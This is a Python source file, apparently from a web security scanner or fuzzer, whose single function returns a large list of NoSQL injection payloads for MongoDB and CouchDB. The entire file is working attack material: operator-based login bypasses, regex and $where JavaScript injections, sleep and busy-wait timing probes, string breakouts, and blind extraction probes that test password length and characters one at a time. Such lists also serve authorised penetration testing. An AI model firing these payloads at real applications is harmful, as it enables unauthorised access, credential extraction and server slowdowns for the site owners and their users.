def get_payloads():
    """Returns comprehensive NoSQL injection payloads for MongoDB, CouchDB, etc."""
    return [
        # ==================== AUTHENTICATION BYPASS ====================
        {"$ne": 1},
        {"$ne": -1},
        {"$ne": 0},
        {"$ne": ""},
        {"$ne": "invalid"},
        {"$ne": "null"},
        {"$ne": "undefined"},
        {"$ne": "false"},
        {"$gt": ""},
        {"$gt": "0"},
        {"$gt": " "},
        {"$gte": 0},
        {"$gte": ""},
        {"$lt": "~"},
        {"$lt": "zzzzzzzzzzzz"},
        {"$lte": "~"},
        {"$nin": ["invalid"]},
        {"$nin": []},
        {"$in": [None, "", 0, False]},
        {"$exists": True},
        {"$exists": False},
        {"$or": [{}, {}]},
        {"$or": [{"a": 1}, {}]},
        {"$and": [{"$ne": ""}, {"$ne": None}]},
        
        # ==================== REGEX INJECTION ====================
        {"$regex": ".*"},
        {"$regex": ".+"},
        {"$regex": "^.*$"},
        {"$regex": "^."},
        {"$regex": "^a"},
        {"$regex": "^admin"},
        {"$regex": "^root"},
        {"$regex": "^user"},
        {"$regex": "^test"},
        {"$regex": "[a-z]+"},
        {"$regex": "[A-Za-z0-9]+"},
        {"$regex": ".*", "$options": "i"},
        {"$regex": ".*", "$options": "s"},
        {"$regex": ".*", "$options": "m"},
        {"$regex": "admin", "$options": "i"},
        {"$regex": "^(?!guest).*"},
        {"$regex": "^(?!test).*"},
        
        # ==================== $WHERE JAVASCRIPT - BOOLEAN ====================
        {"$where": "true"},
        {"$where": "1"},
        {"$where": "1==1"},
        {"$where": "0==0"},
        {"$where": "'a'=='a'"},
        {"$where": "return true"},
        {"$where": "return 1"},
        {"$where": "function(){return true}"},
        {"$where": "function(){return 1}"},
        {"$where": "this"},
        {"$where": "this.constructor"},
        {"$where": "this.password"},
        {"$where": "this.password != ''"},
        {"$where": "this.password != null"},
        {"$where": "this.password.length > 0"},
        {"$where": "this.username"},
        {"$where": "this.username == 'admin'"},
        {"$where": "this.username == 'root'"},
        {"$where": "this.user == 'admin'"},
        {"$where": "this.name == 'admin'"},
        {"$where": "this.email"},
        {"$where": "this.role == 'admin'"},
        {"$where": "this.isAdmin"},
        {"$where": "this.isAdmin == true"},
        {"$where": "this.admin == true"},
        {"$where": "this.active == true"},
        {"$where": "this.enabled == true"},
        {"$where": "this.verified == true"},
        
        # ==================== TIME-BASED - SLEEP ====================
        {"$where": "sleep(100)"},
        {"$where": "sleep(500)"},
        {"$where": "sleep(1000)"},
        {"$where": "sleep(2000)"},
        {"$where": "sleep(3000)"},
        {"$where": "sleep(5000)"},
        {"$where": "if(true){sleep(3000)}"},
        {"$where": "if(1){sleep(3000)}"},
        {"$where": "if(this){sleep(3000)}"},
        {"$where": "if(this.username){sleep(3000)}"},
        {"$where": "if(this.password){sleep(3000)}"},
        {"$where": "if(this.user){sleep(3000)}"},
        {"$where": "if(this.pwd){sleep(3000)}"},
        {"$where": "if(this.pass){sleep(3000)}"},
        {"$where": "if(this.email){sleep(3000)}"},
        {"$where": "if(this.name){sleep(3000)}"},
        {"$where": "(function(){sleep(3000)})()"},
        
        # ==================== TIME-BASED - BUSY WAIT ====================
        {"$where": "var t=new Date().getTime();while(new Date().getTime()<t+3000){}"},
        {"$where": "var t=new Date().getTime();while(new Date().getTime()<t+5000){}"},
        {"$where": "if(true){var t=new Date().getTime();while(new Date().getTime()<t+3000){}}"},
        {"$where": "if(this.username){var t=new Date().getTime();while(new Date().getTime()<t+3000){}}"},
        {"$where": "if(this.password){var t=new Date().getTime();while(new Date().getTime()<t+3000){}}"},
        {"$where": "if(this.user){var t=new Date().getTime();while(new Date().getTime()<t+3000){}}"},
        {"$where": "if(this.email){var t=new Date().getTime();while(new Date().getTime()<t+3000){}}"},
        
        # ==================== TIME-BASED - COMPUTATION ====================
        {"$where": "for(var i=0;i<50000000;i++){Math.sqrt(i)}"},
        {"$where": "var x=0;for(var i=0;i<50000000;i++){x+=Math.sqrt(i)}"},
        {"$where": "if(true){var x=0;for(var i=0;i<50000000;i++){x+=Math.sqrt(i)}}"},
        
        # ==================== STRING BREAKOUT ====================
        "' || '1'=='1",
        "' || 1==1 || '",
        "\" || \"1\"==\"1",
        "\" || 1==1 || \"",
        "'; return true; //",
        "\"; return true; //",
        "'; return 1; //",
        "1'; return true; //",
        "1\"; return true; //",
        "|| true",
        "|| 1==1",
        "&& false || true",
        "//",
        "'; //",
        "\"; //",
        "' || ''=='",
        "\" || \"\"==\"",
        
        # ==================== OPERATOR INJECTION ====================
        {"$size": 0},
        {"$size": 1},
        {"$size": {"$gt": -1}},
        {"$type": 1},
        {"$type": 2},
        {"$type": 3},
        {"$type": 4},
        {"$type": 10},
        {"$type": 16},
        {"$type": "string"},
        {"$type": "object"},
        {"$type": "array"},
        {"$not": {"$type": 10}},
        {"$not": {"$eq": "invalid"}},
        {"$mod": [1, 0]},
        {"$all": ["admin"]},
        {"$all": []},
        {"$elemMatch": {"$ne": "x"}},
        {"$elemMatch": {"$exists": True}},
        
        # ==================== ADVANCED / AGGREGATION ====================
        {"$expr": {"$eq": ["$username", "admin"]}},
        {"$expr": {"$eq": ["$user", "admin"]}},
        {"$expr": {"$eq": ["$name", "admin"]}},
        {"$expr": {"$ne": ["$password", ""]}},
        {"$expr": {"$gt": [{"$strLenCP": "$password"}, 0]}},
        {"$comment": "injection_test"},
        
        # ==================== BLIND EXTRACTION SEEDS ====================
        {"$where": "this.password.length > 0"},
        {"$where": "this.password.length > 5"},
        {"$where": "this.password.length > 10"},
        {"$where": "this.password.length > 20"},
        {"$where": "this.password.length > 30"},
        {"$where": "this.password.length == 32"},
        {"$where": "this.username.length > 0"},
        {"$where": "this.username.length > 3"},
        {"$where": "this.username.charAt(0) == 'a'"},
        {"$where": "this.password.charAt(0) == 'a'"},
        {"$where": "this.password.match(/^[a-f0-9]+$/)"},
        {"$where": "this.password.match(/[0-9]/)"},
        {"$where": "this.password.match(/[a-z]/)"},
        {"$where": "this.password.match(/[A-Z]/)"},
        
        # ==================== ERROR PROVOCATION ====================
        {"'": "1"},
        {"\"": "\""},
        {"\\": "\\"},
        {"$": 1},
        {"$a": 1},
        {"$invalid": 1},
        {"$[": 1},
        {"$where": "throw 'error'"},
        {"$where": "throw new Error('test')"},
        {"$where": "undefined.foo"},
        {"$where": "null.foo"},
        {"$where": "return 1/0"},
        
        # ==================== COUCHDB / OTHER NOSQL ====================
        {"startkey": "a", "endkey": "z"},
        {"startkey": "", "endkey": "zzz"},
        {"key": "admin"},
        {"keys": ["admin", "root", "user"]},
        {"map": "function(doc){emit(doc._id,null)}"},
        {"reduce": "_count"},
        
        # ==================== COMBINED / POLYGLOT ====================
        {"$ne": "' OR '1'='1"},
        {"$ne": "\" OR \"1\"=\"1"},
        {"$or": [{}, {"a": "a"}]},
        {"$or": [{}, {"$where": "true"}]},
        {"$and": [{"$ne": ""}, {"$or": [{}]}]},
        {"_id": {"$ne": 1}},
        {"_id": {"$gt": ""}},
        {"id": {"$ne": 1}},
        {"userId": {"$ne": 1}},
        {"user_id": {"$ne": 1}},
    ]
